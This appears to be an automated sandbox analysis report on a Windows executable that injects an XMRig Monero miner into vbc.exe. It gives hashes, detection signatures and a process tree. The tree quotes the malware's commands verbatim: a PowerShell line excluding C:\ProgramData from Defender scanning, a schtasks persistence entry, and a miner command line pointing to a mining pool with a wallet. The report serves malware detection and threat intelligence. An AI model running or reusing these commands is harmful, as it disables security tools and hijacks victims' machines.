Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/01/2023, 04:05
Static task
static1
Behavioral task
behavioral1
Sample
4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe
Resource
win7-20220812-en
General
-
Target
4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe
-
Size
915KB
-
MD5
3765402885c00738ddbeed380dea158c
-
SHA1
e267858ec805bbc06d0be0a4aca461dc0f8ed0f8
-
SHA256
4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11
-
SHA512
cfb558448e38ef50cbe9eed66ef73c2ea5ead2c0d08b1dbfd16b3801ab8fa441671ebbae3ddfbfa1ec53f1dbc2edfc37a94e04c7dc12545afd319033d59d31bb
-
SSDEEP
24576:jtVSn52by6CyzuHVIP9/2X+NiX+F5aEEMlcc9+ZF:fSn52u6Cy4VI065a9
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/908-106-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-108-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-110-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-111-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-116-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-118-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-120-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-121-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/908-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-125-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/908-128-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1752 set thread context of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1764 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1460 powershell.exe 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeLockMemoryPrivilege 908 vbc.exe Token: SeLockMemoryPrivilege 908 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 908 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1752 wrote to memory of 1460 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 26 PID 1752 wrote to memory of 1460 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 26 PID 1752 wrote to memory of 1460 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 26 PID 1752 wrote to memory of 1748 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 28 PID 1752 wrote to memory of 1748 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 28 PID 1752 wrote to memory of 1748 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 28 PID 1748 wrote to memory of 1764 1748 cmd.exe 30 PID 1748 wrote to memory of 1764 1748 cmd.exe 30 PID 1748 wrote to memory of 1764 1748 cmd.exe 30 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32 PID 1752 wrote to memory of 908 1752 4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe"C:\Users\Admin\AppData\Local\Temp\4a5416288b34a01fbad95b77b9026621e6539027fd7ec7bb72c99c7b031c6f11.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "REFAP" /tr "C:\ProgramData\winzip\REFAP.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "REFAP" /tr "C:\ProgramData\winzip\REFAP.exe"3⤵
- Creates scheduled task(s)
PID:1764
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:908
-